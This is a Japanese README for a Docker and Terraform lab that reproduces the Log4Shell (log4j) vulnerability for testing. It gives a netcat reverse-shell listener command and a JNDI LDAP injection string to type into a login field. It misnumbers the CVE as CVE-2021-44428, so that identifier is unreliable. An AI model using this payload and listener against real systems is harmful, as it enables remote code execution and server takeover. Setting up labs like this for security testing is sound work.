
TerraformとDockerリソースを使用して、CVE-2021-44428のテストを迅速に立ち上げるためのリソースです。
このリポジトリは、Docker と Hashicorp Terraform を使用して log4j の脆弱性を迅速にテストするためにセットアップされています。このテストのすべてのコンポーネントは Docker ネットワーク上の Docker コンテナ内で実行され、'host.docker.internal' 経由でアクセスできます。
このテスト環境は、Raxis の素晴らしいブログ記事 (https://raxis.com/blog/log4j-exploit) を基にしています。
脆弱性のあるアプリケーションとエクスプロイトコードは cyberxml (https://github.com/cyberxml/log4j-poc) から提供されたものです。
私が行ったのは、このおいしいエクスプロイトを簡単に起動してテストできるように環境をコード化しただけです。
私は、このリポジトリの資料の使用によって生じる可能性のある悪影響や悪意のある行為について、一切の責任を負いません。以上です。これらの資料が信頼できるかどうかを判断するのはあなた次第であり、この情報を倫理的に使用するのも同様にあなたの責任です。私は、研究者、学生、セキュリティ専門家がすぐに環境を作成し、エクスプロイトを自分たちでテストできるように、これらのグッズを投稿しているだけです。シークレスト、以上。
'docker exec -it netcat /bin/bash' または同様のコマンドを使用して、log4j_netcat コンテナにシェルで入ります。ここが、確立された後に被害者サーバーへのシェル接続を受け取る場所です。
log4j_netcat コンテナ内のセッションで、次のコマンドを入力してリスナーを起動します:
nc -lv -s 0.0.0.0 -p 9001
ブラウザで http://host.docker.internal:8080/log4shell/ に移動します。
'Username' フィールドに次の内容を入力し、'Password' フィールドには任意の内容を入力します:
${jndi:ldap://host.docker.internal:1389/a}
log4j_netcat コンテナのシェルに戻り、被害者サーバーに接続したことを確認します。
さあ、大混乱を引き起こしましょう!